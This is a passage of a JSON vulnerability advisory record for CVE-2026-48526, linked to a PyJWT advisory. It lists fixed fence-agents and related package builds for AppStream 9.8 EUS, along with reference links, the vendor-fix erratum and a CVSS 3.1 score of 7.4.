"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-0:4.10.0-110.el9_8.3.src",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-aliyun-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-all-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-all-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-all-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-all-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-amt-ws-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-apc-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-apc-snmp-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-aws-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-azure-arm-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-bladecenter-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-brocade-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-cisco-mds-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-cisco-ucs-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-common-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-compute-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-compute-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debuginfo-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debuginfo-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debuginfo-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debugsource-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debugsource-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debugsource-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debugsource-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-drac5-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-eaton-snmp-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-emerson-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-eps-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-gce-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-heuristics-ping-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-hpblade-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ibm-powervs-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ibm-vpc-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ibmblade-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ifmib-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ilo-moonshot-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ilo-mp-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ilo-ssh-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ilo2-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-intelmodular-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ipdu-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ipmilan-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-lpar-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-mpath-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-nutanix-ahv-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-openstack-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-openstack-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-redfish-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-redfish-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-redfish-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-redfish-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-rhevm-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-rsa-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-rsb-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-sbd-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-scsi-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-virsh-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-vmware-rest-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-vmware-soap-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-wti-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-zvm-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virt-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virt-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-cpg-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-cpg-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-libvirt-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-libvirt-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-multicast-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-multicast-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-serial-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-serial-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-tcp-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-tcp-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:ha-cloud-support-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:ha-cloud-support-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:ha-cloud-support-debuginfo-0:4.10.0-110.el9_8.3.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-48526"
},
{
"category": "external",
"summary": "RHBZ#2482734",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482734"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-48526",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48526"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-48526",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48526"
},
{
"category": "external",
"summary": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx",
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx"
}
],
"release_date": "2026-05-28T15:09:09.258000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-16T12:16:14+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-0:4.10.0-110.el9_8.3.src",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-aliyun-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-all-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-all-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-all-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-all-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-amt-ws-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-apc-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-apc-snmp-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-aws-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-azure-arm-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-bladecenter-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-brocade-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-cisco-mds-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-cisco-ucs-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-common-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-compute-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-compute-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debuginfo-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debuginfo-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debuginfo-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debugsource-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debugsource-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debugsource-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debugsource-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-drac5-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-eaton-snmp-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-emerson-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-eps-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-gce-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-heuristics-ping-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-hpblade-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ibm-powervs-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ibm-vpc-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ibmblade-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ifmib-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ilo-moonshot-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ilo-mp-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ilo-ssh-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ilo2-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-intelmodular-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ipdu-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ipmilan-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-lpar-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-mpath-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-nutanix-ahv-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-openstack-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-openstack-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-redfish-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-redfish-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-redfish-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-redfish-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-rhevm-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-rsa-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-rsb-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-sbd-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-scsi-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-virsh-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-vmware-rest-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-vmware-soap-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-wti-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-zvm-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virt-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virt-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-cpg-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-cpg-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-libvirt-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-libvirt-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-multicast-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-multicast-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-serial-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-serial-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-tcp-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-tcp-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:ha-cloud-support-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:ha-cloud-support-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:ha-cloud-support-debuginfo-0:4.10.0-110.el9_8.3.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:26206"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-0:4.10.0-110.el9_8.3.src",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-aliyun-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-all-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-all-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-all-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-all-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-amt-ws-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-apc-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-apc-snmp-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-aws-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-azure-arm-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-bladecenter-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-brocade-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-cisco-mds-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-cisco-ucs-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-common-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-compute-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-compute-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debuginfo-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debuginfo-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debuginfo-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debugsource-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debugsource-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debugsource-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-debugsource-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-drac5-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-eaton-snmp-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-emerson-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-eps-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-gce-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-heuristics-ping-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-hpblade-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ibm-powervs-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ibm-vpc-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ibmblade-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ifmib-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ilo-moonshot-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ilo-mp-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ilo-ssh-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ilo2-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-intelmodular-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ipdu-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ipmilan-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.s390x",
